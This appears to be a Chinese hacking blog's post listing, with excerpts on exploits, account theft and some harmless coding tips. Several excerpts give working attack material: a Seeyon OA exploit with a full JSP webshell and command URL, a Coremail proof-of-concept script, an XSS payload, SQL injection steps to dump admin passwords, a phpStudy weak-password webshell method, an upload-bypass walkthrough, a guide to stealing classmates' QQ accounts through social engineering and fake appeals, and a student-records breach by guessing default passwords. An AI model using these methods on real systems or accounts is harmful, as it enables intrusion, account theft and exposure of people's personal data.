• 外面接单的QQ永久方法稳

    722解封永久冻结QQ漏洞教程 条件: 1.微信绑定了冻结的QQ号 2.微信钱包已经实名认证 3.微信不能停封 教程: 教程:拨打电话95017,按提示按9,然后输入被冻结的QQ,按#号。 然后输入微信的实名认证的身份证,按#号。输入微信支付密码,按#号。 然后输入目前拨打电话的手机号,按#号。然后回收到短信,无需理会, 按电话语音提示是否冻结微信号,按#号,然后提示是否冻结微信绑定的QQ号,按#号。 然后会收到三条短信,接着挂断电话,去:aq.qq.com/007即可修改QQ密码。 然后去:https://url.cn/5LNndkJ解封微信帐号,即可 ...

    2019-07-21 1099
  • 利用社会工程学申诉盗号技术

    社会工程学 很多朋友,不懂这个社会工程学,是啥意思》》》》 社工(社会工程学)简称,一种人为心理学的攻击手段,大概主旨含义你可以理解成所有的防火墙或者权限,再安全也只是相对的,因为操作他的是人,所以只要对人身进行了渗透攻击,那所有的信息会被你暴露无遗。 还可以理解为,通过心里学的手段骗取人的信任,并且最终获得他的个人资料或者是他身处的其他信息。 很多朋友经常问我你是怎么盗取别人账号的,,,现实生活中也有一上来就问: “嘿,毒蜂你是怎么盗号的,能不能教教我???!!” 今天毒蜂就给大家讲解一下,以前毒蜂还是六年级小学生的时候是如何社工我同学QQ号的emm 首先为了锻炼技术and好奇网上一堆社会工程学说的是不是真的,所以我假装不认识他。但是我手里有我班同学的身份证号(这个关于怎么社工身份证网上有很多教程,但是我觉得都不怎么样!不知道大牛有没有什么好滴办法)其他的我都百度+社工库!  其次想要一个等级比较高的QQ账号,因为这样看起来比较装X和靓丽, 幸幸苦苦社工别人账号,只为了你们能叫我一声“靓仔”,结果他们却把账号申诉回去,还叫了我“屌毛”{可以忽略这段,主要为了缓解气氛} ok开始 1.在社工库查到他2个曾用密码和去谷歌搜索引擎搜索他的各种账号(很有可能搜索到你想要的信息) 2.然后百度查他微博,查看资料知道名字、住址(尽量收集对我们盗号有利的信息)  3.然后去他空间,翻他的说说跟留言板,开小号加了他经常联系的几个朋友(赞他说说,给他留言的人)  4.用小号跟加那几个好友说:我号被盗!帮忙申诉!对方回复OK!就ok了(友情提示:一定要找3个或3个以上好友 否则几率会变小!我前两次就是因为好友少所以失败!!!!!) OK!!一切准备就绪! 5.进入QQ安全中心 申诉!填写姓名 、身份证号 然后下一步,就是曾用密码(社工库查到的),注册地常登陆地(微博有资料),看Q龄知道他的注册年份!然后填写好友QQ、手机号(用小号直接问!)  然后申诉 成功改密码密保! 6.打电话催办申诉,直接给客服提供你所收集到的信息 关于那个社工身份证号,我有一点想法,首先就是了解其喜好或者是最近在干什么,比方说!我看见他说说上学了!那么我就可以查出他的学校,然后伪装成学校招生办!要求提供身份证!当然这只是一个思路!!希望老鸟能提供更好的方法!!! 此教学仅作为学习参考,请勿用于违法犯罪用途 ...

    2019-07-06 1400
  • 用C语言画出一个“爱心”,撩妹技能杠杠的

    用C语言画出一个“爱心”,撩妹技能杠杠的 编程之美 源于发现 用C语言,编写自己人生的源代码!!! 学习C语言虽然乏味,枯燥。但是我们可以在玩中学,可以自己输出一些字符画,来放松心情。 爱心字符画代码如下; #include <stdio.h> int main() { for (float y = 1.5f; y > -1.5f; y -= 0.1f) { for (float x = -1.5f; x < 1.5f; x += 0.05f) { float a = x * x + y * y - 1; putchar(a * a * a - x * x * y * y * y <= 0.0f ? '*' : ' '); } putchar('\n'); } } 输入图: 程序运行效果图: 在学习中,寻找灵感,不断TOP C语言编程的种种局限和不可能!!! 只有想不到,没有做不到!!! ...

    2019-07-05 2621
  • 360浏览器 – dll劫漏洞

    0x00:前言  记录下学习的浏览器漏洞方法。 这个漏洞很简单,很多浏览器里面都有。   0x01:原理 浏览器启动时,会自动加载当前目录下载dll模块,在加载系统dll,若发现存在dll模块存在时,浏览器就会调用该dll模块执行。如果加载中未发现 dll,攻击者可以构造一个恶意dll。   0x02:360浏览器dll window.location.href='https://api.3v1.cc/violation/?word= window.location.href='https://api.3v1.cc/violation/?word= window.location.href='https://api.3v1.cc/violation/?word=劫持'; '; '; 使用到的工具: Procmon汉化版 v3.20.0.0 dll模块(可自己编写32位,兼容性。) DllHijackAuditor (自动化工具效果不是太好) procexp 360最新版本的...

    2019-07-03 1503
  • 树洞外链xss+越权漏洞

    0x00:xss漏洞 上传一张图片,在创建文件名添加xss,公开是分享文件广场。 ><svg/onload=alert(6)> 0x01:越权 (需要条件,可以爆破。32位随机字符) 需要key值。 c74bffaa1cd2a4eda30bd72fe5453bb0 0x02:结束语 爬了一下在用树洞外链的网站,一共有211个网站。...

    2019-07-03 1314
  • 在线Windows系统15分钟免费使用

    无需注册,进入网站后,系统会分配给你一个在线的、临时的Windows操作系统 此操作系统仅能使用15分钟,同时注意保持网络连接稳定,如果断开将无法重新连接此系统。 机器都是亚马逊家(AWS)高配 Windows Server 2016虚拟机。 有权限限制,桌面有Chrome浏览器,5G马上就来了,这种云上的系统会是发展趋势。 需要硬件处理的部分交给高性能服务器,用户端只需高速网络接收数据即可。 地址:https://demo.glyptodon.com...

    2019-07-03 1046
  • windows安装中国蚁剑

    中国蚁剑 antSword-github antSword-百度网盘 安装步骤 等初始化完成后,然后如图再打开一次AntSword.ext就ok了...

    2019-07-01 1992
  • 利用PHPstudy探针弱口令漏洞批量拿shell

    关键字:phpStudy 探针 2014 搜到后随便找一个站 然后打开是这种的 弱口令:root 成功,如下图 然后进入phpmyadmin 后台账号是root密码也是root 接下来就是怎么拿shell了 探针上面有个绝对路径和探针路径,我们这里需要的是绝对路径。如图 进入后台我们需要打开变量 然后在变量里面找到general log 和 general log file 你可以用 CTRL+F 需要把general log 改成ON 把 general log file修改成绝对路径的地址。C:/phpStudy/WWW/.xxx.php >>>这个xxx.php是你一句话的地址 如图。 修改好后。我们需要把这个命令插入到我们指定的php文件里 如图。 ...

    2019-06-30 3749
  • 关于coremail的0day附带poc

    import requests,sys def mailsmsPoC(url): url = url + “/mailsms/s?func=ADMIN:appState&dumpConfig=/” r = requests.get(url) if (r.status_code != ‘404’) and (“/home/coremail” in r.text): print “mailsms is vulnerable: {0}”.format(url) else: print “mailsms is safe!” if __name__ == ‘__main__’: try: mailsmsPoC(sys.argv[1]) except: print “usage: python poc.py http://hi-ourlife.com/” 修改url即可用 ...

    2019-06-30 1420
  • Python爬虫之-爬取妹子图片

    #coding=utf-8 import requests from bs4 import BeautifulSoup import os all_url = ‘http://www.mzitu.com’ #http请求头 Hostreferer = { ‘User-Agent’:’Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)’, ‘Referer’:’http://www.mzitu.com’ } Picreferer = { ‘User-Agent’:’Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)’, ‘Referer’:’http://i.meizitu.net’ } #此请求头破解盗链 start_html = requests.get(all_url,headers = Hostreferer) #保存地址 path = ‘G:\python\妹子\liang’ #找寻最大页数 soup = BeautifulSoup(start_html.text,”html.parser”) page = soup.find_all(‘a’,class_=’page-numbers’) max_page = page[-2].text same_url = ‘http://www.mzitu.com/page/’ for n in range(1,int(max_page)+1): ul = same_url+str(n) start_html = requests.get(ul, headers = Hostreferer) soup = BeautifulSoup(start_html.text,”html.parser”) all_a = soup.find(‘div’,class_=’postlist’).find_all(‘a’,target=’_blank’) for a in all_a: title = a.get_text() #提取文本 if(title != ”): print(“准备扒取:”+title) #win不能创建带?的目录 if(os.path.exists(path+title.strip().replace(‘?’,”))): #print(‘目录已存在’) flag=1 else: os.makedirs(path+title.strip().replace(‘?’,”)) flag=0 os.chdir(path + title.strip().replace(‘?’,”)) href = a[‘href’] html = requests.get(href,headers = Hostreferer) mess = BeautifulSoup(html.text,”html.parser”) pic_max = mess.find_all(‘span’) pic_max = pic_max[10].text #最大页数 if(flag == 1 and len(os.listdir(path+title.strip().replace(‘?’,”))) >= int(pic_max)): print(‘已经保存完毕,跳过’) continue for num in range(1,int(pic_max)+1): pic = href+’/’+str(num) html = requests.get(pic,headers = Hostreferer) mess = BeautifulSoup(html.text,”html.parser”) pic_url = mess.find(‘img’,alt = title) print(pic_url[‘src’]) #exit(0) html = requests.get(pic_url[‘src’],headers = Picreferer) file_name = pic_url[‘src’].split(r’/’)[-1] f = open(file_name,’wb’) f.write(html.content) f.close() print(‘完成’) print(‘第’,n,’页完成’) ...

    2019-06-30 1621
  • 武汉某大学-学生信息泄露

    也是无聊的时候无意间逛见的,进入主题。 看到可能会想怎么进去,我就去百度搜了一下教务管理系统用户名和密码是多少 百度告诉我的答案普遍是账号是学号密码也是学号或者密码是123456, 接下来知道了那么我们该怎么去获取学号呢。 1.百度武汉xxxx职业技术学院学号 如图 接下来去试试此学号有无有用。 上面百度收集到的信息说是密码可能是学号也可能是123456 或者是别的试一试吧 运气不错进来了。那么就看看有没有别的信息了 我在学籍卡片处看到往下滑的时候看到了身份证号!!! 这已经涉及到信息泄露了。 接下来,我们在试试别的学号看能否进。 以此学号 推断一下 学号:1113033 7位数 试试1113034 能否进去 依旧可以用进 推断密码默认学号。学号是用递进的方式形成的, 我们看到了图上所示 院系:智能制造工程系 专业:包装技术与设计 学制:3.0 班级:11级包装技术与设计1班 我们看到了这些 再看学号(学号是1113034) 注意到什么没 11级 一班正好对应学号前面的111 那么把111修改成 1513001试试看呢。 成功 密码依旧是学号,那么就可以以此类推,但是我在这次进15级的这个学生我发现了,地址也有了, 就到这了吧。 此学校泄露信息。有姓名,身份证,地址。证件照。 ...

    2019-06-30 888
  • SWAPIDC答题答案

    注意答案排序可能不一样 第一题 第二题 第三题 第四题 ...

    2019-06-28 2769
  • 致远OA系统远程命令代码执行漏洞

    1.致远OA A8无需认证代码执行漏洞 网站地址:http://127.0.0.1:8088/seeyon/index.jsp 因为不方便透露漏洞网址,就用127.0.0.1代替。网站页面如下↓↓↓ 2. 接下来用:/seeyon/htmlofficeservlet 来访问。http://127.0.0.1:8088/seeyon/htmlofficeservlet 如果出现了 DBSTEP V3.0 0 21 0 htmoffice operate err 哪就证明可能漏洞是存在的 3. 然后我们打开burp,需要POST一个shell上去.如何抓包就不说了。 然后点Go 4. 然后复制下面的jsp木马到POST包里面如图 DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV OPTION=S3WYOSWLBSGr currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 CREATEDATE=wUghPB3szB3Xwg66 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 srcFileId=wV66 srcCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6 needReadFile=yRWZdAS6 srcCreateDate=wLSGP4oEzLKAz4=iz=66 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println(" “+excuteCmd(request.getParameter(“cmd”)) + “ “);}else{out.println(“:-)”);}%>6e4f045d4b8506bf492ada7e3390d7ce 5. 上面成功插入了jsp一句话木马接下来如下。 默认文件名是:test123456 然后访问网站 http://127.0.0.1:8088/seeyon/test.jsp 6. 然后运行以下代码 /seeyon/test.jsp?pwd=asasd3344&cmd=whoami 完整如这>>> http://127.0.0.1:8088/seeyon/test.jsp?pwd=asasd3344&amp;cmd=whoami 运行成功 administrator权限能干什么就不用多说了吧 请勿进行违法操作 ...

    2019-06-27 6860
  • 一次实战拿shell上传绕过

    一、物理路径 在url后面随便输入个字符,得到网站物理路径 二、whois信息 没有查到其他whois信息 三、Whatweb 四、端口 21端口是文件传输协议,如果被非正常手段登录,将会面临服务器/空间文件泄露问题 3306端口是mysql数据库的默认端口,如果被非正常手段登录,将会面临数据库泄露问题 445是曾经暴出”永恒之蓝”病毒的端口 五、后台 后台系统及型号 六、编辑器 抓包获取编辑器地址,并且发现是dede下的编辑器,估计模板也是dede二次加工的了。 七、拿shell(仅列举一种方法-上传绕过) 直接上传一句话木马(php后缀),提示文件类型不正确 将一句话木马后缀修改为jpg格式,继续上传 。 上传成功。打开burpsuite,重新上传jpg后缀的一句话木马 。 将yjh.jpg修改为yjh.php[空格]。一定要在修改完的php后缀后面加上一个空格。如下图 然后点击action里面的send to repeater 。 打开repeater下的Hex,查找到yjh.php文件,修改对应行Hex值,由20改为00 。 即可发现原来的空格已经没有了 。 然后点击Go,放包。 链接访问成功,然后拿出中国菜刀,连接shell。 ...

    2019-06-27 1132
  • C语言-扬帆起航

    用C语言在控制台输出 一些字符图案!!! 编译器:VS2019版本 代码如下 #include<stdio.h> #include<windows.h> int color(int c) { SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), c); //更改文字颜色 return 0; } int main() { color(13); printf(" \n"); printf(" | | | \n"); printf(" )_) )_) )_) \n"); printf(" )___))___))___)╲_ \n"); printf(" )____)____)_____)╲╲_ \n"); printf(" H ____E___|__L__|__L__|__O__╲╲╲__________ \n"); printf(" ---------╲_____偏锋表哥_____扬帆起航_____________╱--------- \n"); printf(" ^^^^^ ^^^^^ ^^^^ ^^^^^^^ ^^^^^ ^^^ \n"); printf(" \n"); return 0; } 效果图 ...

    2019-06-26 908
  • SQL注入语法

    1.判断有无注入点: http://127.0.0.1/index.asp?id=1 and 1=1 http://127.0.0.1/index.asp?id=1 and 1=2 http://127.0.0.1/index.asp?id=1′ 2.猜字段数: http://127.0.0.1/index.asp?id=1 order by 字段数 例如: http://127.0.0.1/?id=index.asp? order by 11 http://127.0.0.1/?id=index.asp? order by 12 order by 11页面显示正常 order by 12 页面报错所以字段为11 3.暴露管理员用户、密码: http://127.0.0.1/index.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11 from admin 1、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字为2和3 2、在链接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】即可暴露管理员用户名和密码 http://127.0.0.1/index.asp?id=1 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin 3、到此,即可知道管理员用户名:admin和密码:123456 >>>比较老的一种sql注入.大佬勿喷...

    2019-06-26 1182
  • 简单一招查出有没有人在你电脑里面“偷”资料

    简单一招查出有没有人在你电脑里面“偷”资料 1.左下角 找到“运行” 2. 在运行里面输入 regedit 3.然后按下面的目录 依次打开 HKEY_LOCAL_MACHINE/SYSTEM/CurrentContorSet/Enum/USBSTOR/ Disk&Ven_SanDisk&Prod_Ultra_USB_3.0&Rev_1.00 这个就是使用过的U盘目录 我的电脑是这个 4.我电脑上用过的U盘太多 我就随便选择一个 右边这里就是 使用过的痕迹  5. 这里 右键点击权限 6.打开后 就是这个界面 然后我们把 拒绝下面的选项 全部 √ 上 这样就可以 禁止 这个U 盘 在我们的电脑上“读写”了 (每个U盘的ID都是唯一的) ...

    2019-06-26 1184
  • 解决Win7系统开机显示one or more table pointers are invalid

    WIN7电脑系统 一开机就显示:fatal error: one or more table pointers are invalid modification could be unsafe 按回车可进入系统 (这种情况很多时候是发生在装有固态硬盘的电脑上) 解决方法  先进入系统 点击左下角开始  开始  --运行--   cmd  (以管理员身份运行) 输入slmgr -upk  (卸载秘钥) 回车 稍等一会  就会出现卸载成功的界面 然后重启一遍    再用别的激活工具激活一下系统  再重启 ,就不会显示one or more table pointers are invalid。 ...

    2019-06-26 4812
  • CVE-2019-0708漏洞检测工具

    CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。 有大佬在GitHub上公布CVE-2019-0708的检测工具,并提交了MSF的auxiliary模块。因此,使用MSF即可对目标计算机进行漏洞检测。   GitHub项目:https://github.com/zerosum0x0/CVE-2019-0708 MSF模块:https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb 演示环境:Kali、Windows Server 2008 R2 64位。 Windows服务器需要开启远程桌面服务。   使用方法: 第1步:下载auxiliary模块 从GitHub下载cve_2019_0708_bluekeep.rb文件,把该文件放到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下。 第2步:启动MSF 第3步:使用cve_2019_0708_bluekeep检测模块 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep 第4步:设置目标计算机IP set RHOSTS 192.168.56.133 第5步:开始检测 exploit 如下图红框显示,目标计算机存在CVE-2019-0708漏洞。 ...

    2019-06-11 1620
  • 关于计算机运行的那些事

          今天为大家带来的是一篇如何合理的使用计算机的技术性文章,我相信很多使用计算机的小白在看完这篇文章后,一定会知道更多的关于计算机的使用方法。在日常的生活工作中,我们总是离不开计算机,对计算机的合理使用有助于我们提升工作效率,同时也有助于我们对计算机的管理。下面我从几个方面来讲述一下怎么来合理的使用。 一、关于系统安装或重装       计算机系统在安装或是完全彻底重装前,都会对硬盘进行分区,硬盘分区时应当注意每个分区的存储量,特别是系统盘(C盘)的容量,避免后期因系统盘存储不够而耗费大量的时间来重装系统。列如:128G+1T的存储(128G固态硬盘+1T机械硬盘)如何来分区呢?建议进行如下分区:128G直接分成一个区,只用于存储系统文件和一些必要性的驱动程序文件即可!1T的存储建议分成四个分区,一个用来存储后续的软件,一个当做备份分区,一个用于存储电影、照片类的生活文件,最后一个用于存储专业知识或是工作涉及的文件。当然,你也可以直接将1T的存储划分为三个分区。 注:非系统盘一般格式化时选择NTFS类型。 二、驱动程序安装       重装系统时,当发现计算机的组合建失效时,多数由于缺少了所需驱动程序,只需去官网下载安装即可使用。那么,如何选用当前系统型号的驱动程序呢?win+R运行cmd,输入dxdiag,稍等两秒左右你就会看到你的计算机当前的系统型号,之后访问官网选择驱动程序下载,输入自己的系统型号,官网就会列出当前的系统都有哪些驱动程序文件,建议全部下载安装。安装完成后,系统会要求重启系统以便完成系统的更改,这时,只需重启即可使用。 注:推举安装驱动精灵,扫描当前系统,这时候驱动精灵会列出你的驱动程序有哪些需要升级有哪些没有安装的。一键升级即可,简单、方便、实用。 三、软件安装       非系统必要性的软件下载的时候,多数都会有自定义的安装方式,这时候请前往你留出的分区里新建一个文件夹,合理命名,之后返回软件安装界面,选择你要安装的位置,选你刚建好的文件安装即可。这么做的好处有哪些呢?软件安装位置清楚,避免根目录出现更多的文件,点开时,一脸懵逼,自己都不知道是做什么用的。其次,美观啊! 四、生活类文件与工作类文件       这两种文件单独存放在两个硬盘分区中,到时候找的时候也好找呢。除此之外,在保存文件时,要看清自己的文件存放的位置,避免保存后花费更多的时间来寻找保存的文件。 五、系统维护       计算机在使用时,会产生很多的垃圾,要每隔一段时间进行清理(三天或七天),同时,系统也会出现很多的漏洞,安装合适的防护软件是及其重要的。推举:360软件、电脑管家.......在众多的防护软件中选一款自己喜欢的就好。       总结:系统的首次安装要注意合理分区。后续的重装请装上当前系统型号的所有驱动程序。文件的保存及其命名时不要粗心大意,对各分区应当合理划分使用,以保证系统的长时间运行。 ...

    2019-04-21 845

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注